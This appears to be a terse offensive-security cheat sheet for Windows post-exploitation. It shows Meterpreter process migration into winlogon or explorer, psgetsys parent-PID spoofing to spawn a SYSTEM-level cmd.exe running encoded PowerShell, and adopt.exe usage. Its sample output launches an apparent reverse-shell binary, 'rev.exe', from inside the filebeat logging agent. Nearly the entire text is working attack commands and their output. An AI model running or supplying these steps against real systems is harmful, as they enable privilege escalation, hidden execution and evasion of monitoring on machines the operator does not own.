Tools
# Inside meterpreter: pick a process to migrate into
ps winlogon        # older versions: ps -S winlogon
# winlogon.exe runs as SYSTEM but migrating into it needs SeDebugPrivilege (an already
# elevated session); explorer.exe is a good candidate to blend into the logged-on user's session
migrate <PID>
# Import module
. .\psgetsys.ps1
# Spawn -command as a child of <PID>; the child inherits that parent's token, so a SYSTEM
# parent gives a SYSTEM child. Needs PROCESS_CREATE_PROCESS access to <PID> (elevated shell for SYSTEM targets)
ImpersonateFromParentPid -ppid <PID> -command "c:\windows\system32\cmd.exe" -cmdargs "/c <POWERSHELL_3_BASE64>"
Ref: psgetsys
# Start <CMD> from inside <PROCESS>: the output below shows adopt.exe resolving ShellExecuteExW
# and running it on a thread in the target, so <CMD> is launched by <PROCESS> itself
.\adopt.exe '<PROCESS>' '<CMD>'
Sample Output:
PS C:\windows\tasks> .\adopt.exe filebeat.exe "C:\windows\tasks\rev.exe"
.\adopt.exe filebeat.exe "C:\windows\tasks\rev.exe"
[>] Target pid is 2776
[>] ShellExecuteExW is at 00007FFBE93E74A0
[>] Thread running, done! (Handle: 192)
Ref: adopt.exe